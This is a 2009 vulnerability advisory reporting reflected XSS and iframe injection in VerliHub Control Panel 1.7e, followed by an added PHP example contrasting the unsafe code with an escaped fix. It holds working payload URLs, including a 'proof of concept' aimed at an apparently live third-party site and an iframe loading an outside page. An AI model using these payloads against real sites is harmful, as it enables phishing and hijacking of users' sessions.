VerliHub Control Panel version 1.7e suffers from cross-site scripting and iframe injection vulnerabilities.
7635916779b1974ce826340348988295154a3a9bfc52105687d3677be7db0d46
VerliHub Control Panel - v 1.7e XSS & Iframe Injection Vulnerability
http://vhcp.verlihub-project.org
-6-05-2009
-Methodman - http://nemesis.te-home.net
-Example:-
Cross-site scripting vulnerability on login page
http://vhcp.com/index.php?page=login&nick="><script>alert("Vulnerable");</script>
http://vhcp.com/index.php?page=login&nick="><iframe src=http://nemesis.te-home.net/index.html?news></iframe>
-Proof of Concept:-
http://wiretransfers.net/index.php?page=login&nick="><script>alert("Vulnerable");</script>
http://wiretransfers.net/index.php?page=login&nick="><iframe src=http://nemesis.te-home.net/index.html?news></iframe>
-Nice screen:-
http://img7.imageshack.us/img7/4660/vhcp.jpg
This vulnerability can be used to perform phishing attacks.
[so verlibug sucks++++ =))]
/teamelite 2009
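The reflected injection described above, next to its fix, as an added example that is not part of the original advisory and is not VHCP's own code. It assumes the login page echoes the `nick` parameter into a double-quoted `value` attribute (which the `">` prefix in the URLs suggests); the function names and the nick policy are hypothetical.

```php
<?php
declare(strict_types=1);

// Added illustration; hypothetical code, not taken from VHCP.

// Vulnerable pattern: the raw query parameter is concatenated into a
// double-quoted attribute, so a value beginning with "> ends the attribute
// and the tag, and whatever follows is parsed as markup.
function render_nick_field_vulnerable(string $nick): string
{
    return '<input type="text" name="nick" value="' . $nick . '">';
}

// Output fix: encode for the HTML attribute context. ENT_QUOTES covers both
// quote styles; ENT_SUBSTITUTE replaces invalid UTF-8 instead of returning ''.
function render_nick_field_safe(string $nick): string
{
    $encoded = htmlspecialchars($nick, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<input type="text" name="nick" value="' . $encoded . '">';
}

// Input check (assumed policy): 1-32 characters from a small allowlist.
// Rejecting early is defence in depth; encoding on output stays mandatory.
function is_valid_nick(string $nick): bool
{
    return preg_match('/\A[A-Za-z0-9_.\[\]-]{1,32}\z/', $nick) === 1;
}

// Constructed inputs: a normal nick and the script payload from the advisory.
$samples = ['Methodman', '"><script>alert("Vulnerable");</script>'];

foreach ($samples as $nick) {
    echo 'valid nick: ', is_valid_nick($nick) ? 'yes' : 'no', "\n";
    echo 'vulnerable: ', render_nick_field_vulnerable($nick), "\n";
    echo 'hardened:   ', render_nick_field_safe($nick), "\n\n";
}
```

The same encoding neutralises the iframe variant, since it also depends on `">` to leave the attribute.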